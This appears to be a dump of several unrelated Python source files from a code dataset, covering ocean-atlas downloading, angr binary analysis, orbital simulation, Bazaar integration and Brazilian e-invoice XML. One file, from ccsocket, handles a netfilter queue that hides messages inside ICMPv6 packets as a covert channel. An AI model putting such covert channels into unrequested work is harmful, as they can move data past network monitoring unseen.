src
stringlengths 721
1.04M
|
---|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import logging
log = logging.getLogger(__name__)
from ..helper import Helper as BaseHelper
from hydroffice.base.ftpconnector import FtpConnector
class Woa09Checker(object):
def __init__(self, force_download=True):
self.present = False
self.atlases_folder = self.get_atlases_folder()
if not self.is_present() and force_download:
self.present = self._download_and_unzip()
else:
self.present = True
@classmethod
def get_atlases_folder(cls):
""" Return the folder used to store atlases. """
ssp_folder = BaseHelper.default_projects_folder()
return os.path.join(ssp_folder, 'Atlases')
@classmethod
def is_present(cls):
""" Check if the WOA09 atlas is present. """
atlases_folder = cls.get_atlases_folder()
if not os.path.exists(atlases_folder):
log.debug('not found atlases folder')
return False
check_woa09_file = os.path.join(atlases_folder, 'woa09', 'landsea.msk')
log.debug("checking WOA09 test file at path %s" % check_woa09_file)
if not os.path.exists(check_woa09_file):
log.debug('not found woa09 atlas')
return False
return True
def _download_and_unzip(self):
""" Attempt to download the WOA09 atlas. """
log.debug('downloading WOA9 atlas')
try:
if not os.path.exists(self.atlases_folder):
os.makedirs(self.atlases_folder)
ftp = FtpConnector("ftp.ccom.unh.edu", show_progress=True, debug_mode=False)
data_zip_src = "fromccom/hydroffice/woa09.red.zip"
data_zip_dst = os.path.join(self.atlases_folder, "woa09.red.zip")
ftp.get_file(data_zip_src, data_zip_dst, unzip_it=True)
return self.is_present()
except Exception as e:
log.error('during WOA09 download and unzip: %s' % e)
return False
|
from typing import TYPE_CHECKING
import claripy
import pyvex
from ...engines.vex.claripy.datalayer import value as claripy_value
from ...engines.light import SimEngineLightVEXMixin
from ..typehoon import typevars, typeconsts
from .engine_base import SimEngineVRBase, RichR
if TYPE_CHECKING:
from .variable_recovery_base import VariableRecoveryStateBase
class SimEngineVRVEX(
SimEngineLightVEXMixin,
SimEngineVRBase,
):
state: 'VariableRecoveryStateBase'
# Statement handlers
def _handle_Put(self, stmt):
offset = stmt.offset
r = self._expr(stmt.data)
size = stmt.data.result_size(self.tyenv) // 8
if offset == self.arch.ip_offset:
return
self._assign_to_register(offset, r, size)
def _handle_Store(self, stmt):
addr_r = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) // 8
r = self._expr(stmt.data)
self._store(addr_r, r, size, stmt=stmt)
def _handle_StoreG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
addr = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) // 8
data = self._expr(stmt.data)
self._store(addr, data, size, stmt=stmt)
def _handle_LoadG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
addr = self._expr(stmt.addr)
if addr is not None:
self.tmps[stmt.dst] = self._load(addr, self.tyenv.sizeof(stmt.dst) // 8)
elif guard is False:
data = self._expr(stmt.alt)
self.tmps[stmt.dst] = data
else:
self.tmps[stmt.dst] = None
def _handle_LLSC(self, stmt: pyvex.IRStmt.LLSC):
if stmt.storedata is None:
# load-link
addr = self._expr(stmt.addr)
size = self.tyenv.sizeof(stmt.result) // self.arch.byte_width
data = self._load(addr, size)
self.tmps[stmt.result] = data
else:
# store-conditional
storedata = self._expr(stmt.storedata)
addr = self._expr(stmt.addr)
size = self.tyenv.sizeof(stmt.storedata.tmp) // self.arch.byte_width
self._store(addr, storedata, size)
self.tmps[stmt.result] = RichR(1)
def _handle_NoOp(self, stmt):
pass
# Expression handlers
def _expr(self, expr) -> RichR:
"""
:param expr:
:return:
:rtype: RichR
"""
r = super()._expr(expr)
if r is None:
bits = expr.result_size(self.tyenv)
return RichR(self.state.top(bits))
return r
def _handle_Get(self, expr):
reg_offset = expr.offset
reg_size = expr.result_size(self.tyenv) // 8
return self._read_from_register(reg_offset, reg_size, expr=expr)
def _handle_Load(self, expr: pyvex.IRExpr.Load) -> RichR:
addr = self._expr(expr.addr)
size = expr.result_size(self.tyenv) // 8
return self._load(addr, size)
def _handle_CCall(self, expr): # pylint:disable=useless-return
# ccalls don't matter
return RichR(self.state.top(expr.result_size(self.tyenv)))
def _handle_Conversion(self, expr: pyvex.IRExpr.Unop) -> RichR:
return RichR(self.state.top(expr.result_size(self.tyenv)))
# Function handlers
def _handle_function(self, func_addr): # pylint:disable=unused-argument,no-self-use,useless-return
return None
def _handle_Const(self, expr):
return RichR(claripy_value(expr.con.type, expr.con.value), typevar=typeconsts.int_type(expr.con.size))
def _handle_Add(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data + r1.data,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
typevar = None
if r0.typevar is not None and r1.data.concrete:
typevar = typevars.DerivedTypeVariable(r0.typevar, typevars.AddN(r1.data._model_concrete.value))
sum_ = r0.data + r1.data
return RichR(sum_,
typevar=typevar,
type_constraints={ typevars.Subtype(r0.typevar, r1.typevar) },
)
def _handle_Sub(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data - r1.data,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
typevar = None
if r0.typevar is not None and r1.data.concrete:
typevar = typevars.DerivedTypeVariable(r0.typevar, typevars.SubN(r1.data._model_concrete.value))
diff = r0.data - r1.data
return RichR(diff,
typevar=typevar,
)
def _handle_And(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data & r1.data)
if self.state.is_stack_address(r0.data):
r = r0.data
elif self.state.is_stack_address(r1.data):
r = r1.data
else:
r = self.state.top(result_size)
return RichR(r)
def _handle_Xor(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data ^ r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Or(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data | r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Not(self, expr):
arg = expr.args[0]
r0 = self._expr(arg)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete:
# constants
return RichR(~r0.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_Mul(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data * r1.data)
r = self.state.top(result_size)
return RichR(r)
def _handle_DivMod(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
try:
signed = "U" in expr.op # Iop_DivModU64to32 vs Iop_DivMod
from_size = r0.data.size()
to_size = r1.data.size()
if signed:
quotient = (r0.data.SDiv(claripy.SignExt(from_size - to_size, r1.data)))
remainder = (r0.data.SMod(claripy.SignExt(from_size - to_size, r1.data)))
quotient_size = to_size
remainder_size = to_size
result = claripy.Concat(
claripy.Extract(remainder_size - 1, 0, remainder),
claripy.Extract(quotient_size - 1, 0, quotient)
)
else:
quotient = (r0.data // claripy.ZeroExt(from_size - to_size, r1.data))
remainder = (r0.data % claripy.ZeroExt(from_size - to_size, r1.data))
quotient_size = to_size
remainder_size = to_size
result = claripy.Concat(
claripy.Extract(remainder_size - 1, 0, remainder),
claripy.Extract(quotient_size - 1, 0, quotient)
)
return RichR(result)
except ZeroDivisionError:
pass
r = self.state.top(result_size)
return RichR(r)
def _handle_Div(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
try:
return RichR(r0.data / r1.data)
except ZeroDivisionError:
pass
r = self.state.top(result_size)
return RichR(r)
def _handle_Shr(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(claripy.LShR(r0.data, r1.data._model_concrete.value),
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
def _handle_Sar(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data >> r1.data._model_concrete.value,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
def _handle_Shl(self, expr):
arg0, arg1 = expr.args
r0 = self._expr(arg0)
r1 = self._expr(arg1)
result_size = expr.result_size(self.tyenv)
if r0.data.concrete and r1.data.concrete:
# constants
return RichR(r0.data << r1.data._model_concrete.value,
typevar=typeconsts.int_type(result_size),
type_constraints=None)
r = self.state.top(result_size)
return RichR(r,
typevar=r0.typevar,
)
def _handle_CmpEQ(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpNE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpLE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpLT(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpGE(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
def _handle_CmpGT(self, expr):
arg0, arg1 = expr.args
_ = self._expr(arg0)
_ = self._expr(arg1)
return RichR(self.state.top(1))
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun <[email protected]>
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
This class handles netfilter queue. Is connected with a parent process
via pipe. Messages are decoded and removed from incoming packets, data
are send to pipe. In passive mode intercept queue both incoming outgo-
ing traffic. Inherits multiprocessing.Process
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
''' Call parent's constructor at first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
Folowing steps prepare netfilter queue with _port as queue
number. There is always only one active queue associated
with given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
Final step raises RuntimeError in case there is some other
queue with the same number active, queue wasn't closed
properly or user's priviledges are insufficient.
'''
try:
self._queue.create_queue(self._port)
except Exception, e:
raise e
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
Runs endless loop. Every time a packet is occurs in queue
_handlepacket method is called.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute packet to correct queue. Verdict NF_QUEUE is 32-bit
number. Lower 16 bits code this verdict and upper 16 bits
are used to identify target queue.
'''
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
Packet doesn't have icmp echo layer or target port isn't active,
accept packet
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Port is ok, we need to check if address matches. Ip6tables rules filter
addresses, but packet might have been rerouted from other queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
Returns tuple (bool, value). True, if packet belongs to this queue. In pa-
ssive mode always returns True. In active mode upperlayer id field must ma-
tch current _port number. Value is number of queue where will be packet re-
routed.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
|
"""
Scenario 1: Game 2
Two bodies (reduced game)
-------------------------
Hypothesize combination of bodies 1 & 4 and 2 & 3
provided trajectory stays sufficiently far from them
"""
from __future__ import division
from PyDSTool import *
import PyDSTool.Toolbox.phaseplane as pp
from bombardier import *
import bombardier
import fovea
import fovea.graphics as gx
from fovea.graphics import tracker
import yaml
with open('bodies_setup.yaml') as f:
setup = yaml.load(f)
body_setup1 = setup['Full_model']
# hypothesize combination of bodies 1 & 4 and 2 & 3
# then the combo of those
# provided stay sufficiently far from them
reduced_data_14 = {1: combine_planets(body_setup1, 1, 4)}
reduced_data_23 = {2: combine_planets(body_setup1, 2, 3)}
body_setup2 = {}
body_setup2.update({0: body_setup1[0]})
body_setup2.update(reduced_data_14)
body_setup2.update(reduced_data_23)
with open('bodies_setup.yaml', 'a') as f:
yaml.dump({'Reduced_model2': body_setup2}, f)
game2 = GUIrocket(body_setup2, "Scenario 1: Game 2", axisbgcol='black')
game2.set( (-70, 0.7) )
game2.go()
dom_thresh = 0.6
def body1_dominant_at_point(pt_array, fsign=None):
"""
Returns scalar relative to user threshold of %age dominant out of net force
"""
global dom_thresh
net_Fs = game2.get_forces(pt_array[0],pt_array[1])[0]
return net_Fs[1]/sum(list(net_Fs.values())) - dom_thresh
# Domain growth testing
game2.current_domain_handler.assign_criterion_func(body1_dominant_at_point)
##
##pd = game2.current_domain_handler.polygon_domain_obj
##n=0
##import sys
##def grow_step():
## global n
## n+=1
## print(n)
## sys.stdout.flush()
## pd.grow_step(verbose=True)
## game2.current_domain_handler.show_domain()
## if any(pd.stop_growing):
## print(pd.stop_growing)
## sys.stdout.flush()
# -------------------------------------------------
# Deprecated ways of obtaining measures of interest
#@prep('arclength')
#def arc(con):
# # vector of arclength along pts
# return arclength(con.sim.pts)
#@prep('contrib_1to2')
#def contrib_1to2(con):
# # vector measure of relative contribution by body 1 along orbit
# return con.workspace.Fs_by_body[1]/con.workspace.Fs_by_body[2]
#@prep('contrib_1toall')
#def contrib_1toall(con):
# return con.workspace.Fs_by_body[1]/con.workspace.net_Fs
# scalar measure of relative variability of net force over entire orbit
# (surrogate for eccentricity in multi-body system)
#@prep('variability_force')
#def variability_force(con):
# return np.std(con.workspace.net_Fs)
# -------------------------------------------------
# Attach measures to a context and select which to be hooked up
# to auto-updated plots as game2 is refreshed
game2.calc_context = calc_context_forces(game2, 'con2')
con2 = game2.calc_context
variability_force = fovea.make_measure('variability_force',
'math.sqrt(np.std(net_Fs))')
con2.declare('PyDSTool.Toolbox.phaseplane', 'pp')
arc = fovea.make_measure('arclength', 'pp.arclength(sim.pts)')
contrib_1to2 = fovea.make_measure('contrib_1to2',
'Fs_by_body[1]/Fs_by_body[2]')
contrib_1toall = fovea.make_measure('contrib_1toall',
'Fs_by_body[1]/net_Fs')
w2 = con2.workspace
con2.attach((arc, contrib_1to2, contrib_1toall,
variability_force))
# Don't need to update order
#con2._update_order = ['', '']
#print(con2.arclength())
#print(con2.contrib_1to2())
tracker(con2, 10, 'arclength', 'contrib_1to2', 'k--')
tracker(con2, 10, 'arclength', 'contrib_1toall', 'k:')
tracker.show()
"""
Task: Find zone in which Body 1 dominates
Define by contrib_1toall > 0.75
1. Select good initial position in zone
2. Grow zone as a circle until fails
(3.) Grow similar circular zones and merge them -> tubes, etc.
4. Create bounding events
... Why? It establishes zone in which analytical estimates
are most valid. So, if we start ICs in that zone then we don't
need simulations to estimate outcomes at exit point
How might it help generate or use further reduced models?
Generate: analytical estimates or a single-body model apply within domain
Error bounds / estimates / correction due to single-body approximation?
How might it help gain insight into the original, full model?
Enables intuitive partial trajectory plan through this zone,
and how it depends on the control parameters a priori
Task: Find sensitivity of zone boundaries to system uncertainty
Q. How does the zone change as system params (masses, positions, etc.) vary?
E.g. to explore their uncertainty to find safest trajectory area to use
"""
eccentricity = fovea.make_measure('ecc', 'sqrt(1+(v*v/(mu*mu) - 2/(r*mu))*(r_cross_v0)**2)')
# This calc_context only applies when body 1 gravity is sufficiently strong
con2_vs1 = bombardier.body_context(game2, 'con2_vs1', 1)
con2_vs1.declare('PyDSTool.Toolbox.phaseplane', 'pp')
# Reuse existing arc measure object
# arc = fovea.make_measure('arclength', 'pp.arclength(sim.pts)')
con2_vs1.attach((arc, eccentricity, total_energy, semimajor, apicenter,
pericenter))
w = con2_vs1.workspace
# decide to monitor actual distance from body 1 along orbit
# to compare with analytical estimate
dist_to_1_vs_peri = fovea.make_measure('dist_to_1_vs_peri', 'pp.dist_vectorized(sim.pos[0], sim.pts[["x","y"]]) - workspace1.peri', workspace1=w)
con2_vs1.attach(dist_to_1_vs_peri)
tracker(con2_vs1, 11, 'arclength', 'dist_to_1_vs_peri', 'k-')
tracker.show()
print("Mismatch of pericenter prediction without reduction: %.5f" % abs(min(w.dist_to_1_vs_peri)))
game2.current_domain_handler.assign_criterion_func(body1_dominant_at_point)
# === FAILS!
#saveObjects(game2, 'game2.sav', force=True)
"""
We find the comparison of analytic peri based on IC to actual peri is not good,
presumably because initial condition is not strongly in the confidence zone
for body 1's dominance. Need error estimates and correction using Game 4 (single combined body).
"""
|
###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord <[email protected]> #
# Copyright: (c) 2008 Cody Precord <[email protected]> #
# License: wxWindows License #
###############################################################################
"""Bazaar implementation of the SourceControl object """
__author__ = "Cody Precord <[email protected]>"
__revision__ = "$Revision: 867 $"
__scid__ = "$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $"
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
""" Bazaar source control class """
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
""" Get the repository authentication info """
output = []
return output
def getRepository(self, path):
""" Get the repository of a given path """
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
while True:
if not root:
break
if os.path.exists(os.path.join(root, '.bzr')):
break
else:
root = os.path.split(root)[0]
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
""" Is the path controlled by BZR? """
t1 = time.time()
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
""" Add paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
""" Checkout files at the given path """
root, files = self.splitFiles(paths)
out = self.run(root, ['checkout',], files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
""" Commit paths to the repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
""" Run the diff program on the given files """
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
""" Make a patch of the given paths """
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
""" Get the revision history of the given paths """
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
""" Convert a timestamp string to a datetime object """
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
def remove(self, paths):
""" Recursively remove paths from repository """
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
def status(self, paths, recursive=False, status=dict()):
""" Get BZR status information from given file/directory """
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
""" Recursively update paths """
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
""" Recursively revert paths to repository version """
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
""" Fetch a copy of the paths' contents """
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
|
# -*- coding: utf-8 -*-
try:
set
except:
from sets import Set as set
from pynfe.entidades import Emitente, Cliente, Produto, Transportadora, NotaFiscal
from pynfe.excecoes import NenhumObjetoEncontrado, MuitosObjetosEncontrados
from pynfe.utils import etree, so_numeros, obter_municipio_por_codigo, obter_pais_por_codigo
from pynfe.utils.flags import CODIGOS_ESTADOS, VERSAO_PADRAO
class Serializacao(object):
"""Classe abstrata responsavel por fornecer as funcionalidades basicas para
exportacao e importacao de Notas Fiscais eletronicas para formatos serializados
de arquivos. Como XML, JSON, binario, etc.
Nao deve ser instanciada diretamente!"""
_fonte_dados = None
_ambiente = 1 # 1 = Produção, 2 = Homologação
_nome_aplicacao = 'PyNFe'
def __new__(cls, *args, **kwargs):
if cls == Serializacao:
raise Exception('Esta classe nao pode ser instanciada diretamente!')
else:
return super(Serializacao, cls).__new__(cls, *args, **kwargs)
def __init__(self, fonte_dados, homologacao=False):
self._fonte_dados = fonte_dados
self._ambiente = homologacao and 2 or 1
def exportar(self, destino, **kwargs):
"""Gera o(s) arquivo(s) de exportacao a partir da Nofa Fiscal eletronica
ou lista delas."""
raise Exception('Metodo nao implementado')
def importar(self, origem):
"""Fabrica que recebe o caminho ou objeto de origem e instancia os objetos
da PyNFe"""
raise Exception('Metodo nao implementado')
class SerializacaoXML(Serializacao):
_versao = VERSAO_PADRAO
def exportar(self, destino=None, retorna_string=False, **kwargs):
"""Gera o(s) arquivo(s) de Nofa Fiscal eletronica no padrao oficial da SEFAZ
e Receita Federal, para ser(em) enviado(s) para o webservice ou para ser(em)
armazenado(s) em cache local."""
# No raiz do XML de saida
raiz = etree.Element('NFe', xmlns="http://www.portalfiscal.inf.br/nfe")
# Carrega lista de Notas Fiscais
notas_fiscais = self._fonte_dados.obter_lista(_classe=NotaFiscal, **kwargs)
for nf in notas_fiscais:
raiz.append(self._serializar_notas_fiscal(nf, retorna_string=False))
if retorna_string:
return etree.tostring(raiz, pretty_print=True)
else:
return raiz
def importar(self, origem):
"""Cria as instancias do PyNFe a partir de arquivos XML no formato padrao da
SEFAZ e Receita Federal."""
raise Exception('Metodo nao implementado')
def _serializar_emitente(self, emitente, tag_raiz='emit', retorna_string=True):
raiz = etree.Element(tag_raiz)
# Dados do emitente
etree.SubElement(raiz, 'CNPJ').text = so_numeros(emitente.cnpj)
etree.SubElement(raiz, 'xNome').text = emitente.razao_social
etree.SubElement(raiz, 'xFant').text = emitente.nome_fantasia
etree.SubElement(raiz, 'IE').text = emitente.inscricao_estadual
# Endereço
endereco = etree.SubElement(raiz, 'enderEmit')
etree.SubElement(endereco, 'xLgr').text = emitente.endereco_logradouro
etree.SubElement(endereco, 'nro').text = emitente.endereco_numero
etree.SubElement(endereco, 'xCpl').text = emitente.endereco_complemento
etree.SubElement(endereco, 'xBairro').text = emitente.endereco_bairro
etree.SubElement(endereco, 'cMun').text = emitente.endereco_municipio
etree.SubElement(endereco, 'xMun').text = obter_municipio_por_codigo(
emitente.endereco_municipio, emitente.endereco_uf,
)
etree.SubElement(endereco, 'UF').text = emitente.endereco_uf
etree.SubElement(endereco, 'CEP').text = so_numeros(emitente.endereco_cep)
etree.SubElement(endereco, 'cPais').text = emitente.endereco_pais
etree.SubElement(endereco, 'xPais').text = obter_pais_por_codigo(emitente.endereco_pais)
